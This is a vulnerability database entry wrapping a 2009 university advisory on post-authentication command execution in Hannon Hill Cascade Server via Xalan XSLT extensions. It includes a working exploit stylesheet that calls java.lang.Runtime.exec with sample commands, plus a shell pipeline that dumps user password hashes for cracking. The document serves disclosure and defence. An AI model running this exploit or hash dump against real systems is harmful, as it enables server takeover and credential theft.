{"href": "https://www.seebug.org/vuldb/ssvid-10851", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-03-20T00:00:00", "title": "Hannon Hill Cascade Server Command Execution Vulnerability (post auth)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10851", "cvelist": [], "description": "No description provided by source.", "viewCount": 10, "published": "2009-03-20T00:00:00", "sourceData": "\n Emory University UTS Security Advisory EMORY-2009-01\r\n\r\nTopic: Command Execution in Hannon Hill Cascade Server\r\n\r\nOriginal release date: March 19, 2009\r\n\r\nSUMMARY\r\n=======\r\n\r\nHannon Hill's Cascade Server product is vulnerable to a command\r\nexecution vulnerability. An attacker with access to an unprivileged\r\naccount within Cascade Server could exploit this vulnerability to run\r\narbitrary commands on the system with the privileges of the user who\r\nstarted Cascade Server.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* Cascade Server, all versions\r\n\r\nIMPACT\r\n======\r\n\r\nAn attacker with access to an unprivileged account within Cascade\r\nServer could exploit this vulnerability to run arbitrary commands on\r\nthe system with the privileges of the user who started Cascade Server.\r\n\r\nThe privileges of that user are necessarily sufficient to gain full\r\nadministrative control of Cascade Server - elevate privileges, conduct\r\ndenial of service, etc.\r\n\r\nDETAILS\r\n=======\r\n\r\nCascade Server allows its users to write XSLT stylesheets which it\r\nuses to transform XML source data into HTML or other formats. Cascade\r\nServer employs the Apache XML Project's Xalan-Java XSLT processor to\r\nperform these transformations.\r\n\r\nThe Xalan-Java site states, \"For those situations where you would like\r\nto augment the functionality of XSLT with calls to a procedural\r\nlanguage, Xalan-Java supports the creation and use of extension\r\nelements and extension functions... 
Extensions written in Java are\r\ndirectly supported by Xalan-Java.\"\r\n\r\nBecause Cascade Server does not restrict the kind of XSLT code users\r\nare able to enter, any user with access to edit XSLT stylesheets can\r\ncause Cascade Server to execute arbitrary Java code. Using the\r\njava.lang.Runtime class, Java can run shell commands.\r\n\r\nWhile the privilege level of the Cascade Server process may prevent\r\nan attacker from gaining complete control of the host system, that\r\nprivilege level is necessarily sufficient to gain full control of\r\nCascade Server.\r\n\r\nSOLUTION\r\n========\r\n\r\nNo full solution exists at this time, but see Recommendations, below.\r\n\r\nHannon Hill is working to develop an official solution, and customers may\r\nwish to monitor its progress using the Hannon Hill ticketing system\r\n(requires a customer account).\r\n\r\nhttp://support.hannonhill.com/browse/CSCD-4753\r\n\r\nRECOMMENDATIONS\r\n===============\r\n\r\nIt may be possible to limit exposure in the following ways:\r\n\r\n* Grant the ability to edit XSLT files only to trusted users.\r\n\r\n* Enforce strong passwords for accounts with XSLT editing privileges.\r\nCascade stores user passwords as base64 encoded SHA1 hashes in the\r\npassword field of the cxml_user table, and can be audited with any\r\nSHA1-capable password cracker. For example, to extract hashes from a\r\nMySQL database in a form usable by John the Ripper's\r\n(http://www.openwall.com/john/) raw-sha1 format (the -N flag skips the\r\ncolumn-name header row so it is not treated as a hash):\r\n\r\necho \"select userName, password from cxml_user\" \\\r\n | mysql -N cascade \\\r\n | perl -ne 'use MIME::Base64; /^(.*?)\\t(.*)/ && print \"$1:\" . unpack(\"H*\", decode_base64($2)).\"\\n\"'\r\n\r\n* Run Cascade Server as a user with as few privileges as possible.\r\n\r\n* On UNIX systems, run Cascade Server in a chroot environment.\r\n\r\nEXPLOIT\r\n=======\r\n\r\nThis exploit example assumes the ability to create and edit blocks,\r\nstylesheets, and pages. 
It's also possible to exploit the\r\nvulnerability simply by modifying an existing stylesheet.\r\n\r\nCreate a stylesheet with the following contents:\r\n\r\n<?xml version=\"1.0\"?>\r\n<xsl:stylesheet exclude-result-prefixes=\"java\" version=\"1.0\"\r\n xmlns:bufferedreader=\"xalan://java.io.BufferedReader\"\r\n xmlns:inputstreamreader=\"xalan://java.io.InputStreamReader\"\r\n xmlns:java=\"http://xml.apache.org/xalan/java\"\r\n xmlns:process=\"xalan://java.lang.Process\"\r\n xmlns:runtime=\"xalan://java.lang.Runtime\"\r\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n <xsl:variable name=\"runtime\" select=\"runtime:getRuntime()\"/>\r\n <xsl:template match=\"//command\">\r\n <xsl:variable name=\"process\" select=\"runtime:exec($runtime, string(.))\"/>\r\n <xsl:variable name=\"inputstream\" select=\"process:getInputStream($process)\"/>\r\n <xsl:variable name=\"inputstreamreader\" select=\"inputstreamreader:new($inputstream)\"/>\r\n <xsl:variable name=\"bufferedreader\" select=\"bufferedreader:new($inputstreamreader)\"/>\r\n <p>\r\n Output: <xsl:value-of select=\"bufferedreader:readLine($bufferedreader)\"/><br/>\r\n </p>\r\n </xsl:template>\r\n</xsl:stylesheet>\r\n\r\nCreate an XML block with the following contents, substituting your own\r\ncommand or commands.\r\n\r\n<command>id</command>\r\n<command>uname -a</command>\r\n...\r\n\r\nCreate or edit a page using a template with at least one region defined.\r\nUnder the configuration tab, set Block to point to your XML block and\r\nStylesheet (AKA Layout in Cascade 5.7+) to point to your stylesheet.\r\n\r\nView the layout or preview tab for that page, and you should see the\r\noutput of your commands. 
Note that the above stylesheet is only able\r\nto display the first line of output.\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThanks to Bradley Wagner and Hannon Hill in general for their quick\r\ninitial response to the problem.\r\n\r\nThanks to Amy Liu and Brett Goodwin of Hannon Hill for their \"Advanced\r\nXSLT\" talk at the 2008 Cascade Server User's Conference, which\r\ninspired this research.\r\n\r\nDISCLAIMER\r\n==========\r\n\r\nThe information in this advisory is provided by Emory as a courtesy\r\nand without any representations or warranties. Recipients are\r\nadvised to conduct their own investigation and due diligence before\r\nrelying on its contents.\r\n\r\nVULNERABILITY HISTORY\r\n=====================\r\n\r\n2008-10-01 Vulnerability discovered\r\n Hannon Hill notified\r\n Ticket opened in Hannon Hill issue tracker\r\n\r\n2008-10-15 Hannon Hill staff member assigned to the issue\r\n\r\n2009-02-23 Hannon Hill staff member reassigned\r\n\r\n2009-03-19 Initial revision of advisory published\n ", "id": "SSV:10851", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:56:04", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645303971, "score": 1659785532, "epss": 1678851499}}